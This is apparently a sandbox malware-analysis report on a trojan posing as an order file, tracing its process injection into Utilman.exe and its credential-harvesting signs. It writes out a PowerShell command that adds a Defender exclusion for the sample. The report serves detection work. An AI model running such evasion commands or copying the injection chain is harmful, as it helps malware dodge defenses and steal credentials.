                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051BA9A67_2_051BA9A6
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F28407_2_050F2840
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050FA8407_2_050FA840
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050D68B87_2_050D68B8
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0511E8F07_2_0511E8F0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AAB407_2_051AAB40
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A6BD77_2_051A6BD7
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050EEA807_2_050EEA80
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A75717_2_051A7571
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0518D5B07_2_0518D5B0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051B95C37_2_051B95C3
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AF43F7_2_051AF43F
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050E14607_2_050E1460
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AF7B07_2_051AF7B0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051356307_2_05135630
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A16CC7_2_051A16CC
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051BB16B7_2_051BB16B
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0512516C7_2_0512516C
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050DF1727_2_050DF172
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050FB1B07_2_050FB1B0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F70C07_2_050F70C0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0519F0CC7_2_0519F0CC
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A70E97_2_051A70E9
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AF0E07_2_051AF0E0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A132D7_2_051A132D
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050DD34C7_2_050DD34C
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0513739A7_2_0513739A
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F52A07_2_050F52A0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0510B2C07_2_0510B2C0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051912ED7_2_051912ED
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A1D5A7_2_051A1D5A
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F3D407_2_050F3D40
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A7D737_2_051A7D73
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0510FDC07_2_0510FDC0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05169C327_2_05169C32
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AFCF27_2_051AFCF2
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AFF097_2_051AFF09
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F1F927_2_050F1F92
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AFFB17_2_051AFFB1
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050B3FD27_2_050B3FD2
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050B3FD57_2_050B3FD5
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F9EB07_2_050F9EB0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051859107_2_05185910
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0510B9507_2_0510B950
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F99507_2_050F9950
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0515D8007_2_0515D800
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050F38E07_2_050F38E0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AFB767_2_051AFB76
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0510FB807_2_0510FB80
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05165BF07_2_05165BF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0512DBF97_2_0512DBF9
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051AFA497_2_051AFA49
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_051A7A467_2_051A7A46
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05163A6C7_2_05163A6C
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05135AA07_2_05135AA0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0518DAAC7_2_0518DAAC
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05191AA37_2_05191AA3
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0519DAC67_2_0519DAC6
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03211F407_2_03211F40
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320CFF07_2_0320CFF0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320AFD07_2_0320AFD0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320CDCD7_2_0320CDCD
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320CDD07_2_0320CDD0
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320124B7_2_0320124B
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320B1207_2_0320B120
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0320B1187_2_0320B118
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_032137D97_2_032137D9
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_032156307_2_03215630
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_032138207_2_03213820
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0321381F7_2_0321381F
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0322BD007_2_0322BD00
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540E4957_2_0540E495
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540E3787_2_0540E378
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540E8307_2_0540E830
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540D8F87_2_0540D8F8
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540CB987_2_0540CB98
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: String function: 018FB970 appears 280 times
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: String function: 01945130 appears 58 times
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: String function: 0198F290 appears 105 times
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: String function: 0197EA12 appears 86 times
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: String function: 01957E54 appears 111 times
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: String function: 050DB970 appears 280 times
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: String function: 05137E54 appears 111 times
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: String function: 0516F290 appears 105 times
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: String function: 05125130 appears 58 times
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: String function: 0515EA12 appears 86 times
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2114968626.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000000.2091621155.0000000000C32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexdNq.exe< vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2127685427.0000000007520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameutilman2.exej% vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000019FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exeBinary or memory string: OriginalFilenamexdNq.exe< vs ORDER REF 47896798 PSMCO.exe
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, WVyNmFfWHFtrghUQ4t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, WVyNmFfWHFtrghUQ4t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@17/10
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER REF 47896798 PSMCO.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg0wlaew.2sd.ps1Jump to behavior
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: ORDER REF 47896798 PSMCO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Utilman.exe, 00000007.00000002.4553324298.00000000033AC000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4553324298.00000000033DB000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4553324298.00000000033B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: ORDER REF 47896798 PSMCO.exeVirustotal: Detection: 48%
                      Source: ORDER REF 47896798 PSMCO.exeReversingLabs: Detection: 52%
                      Source: unknownProcess created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"Jump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Utilman.pdb source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp
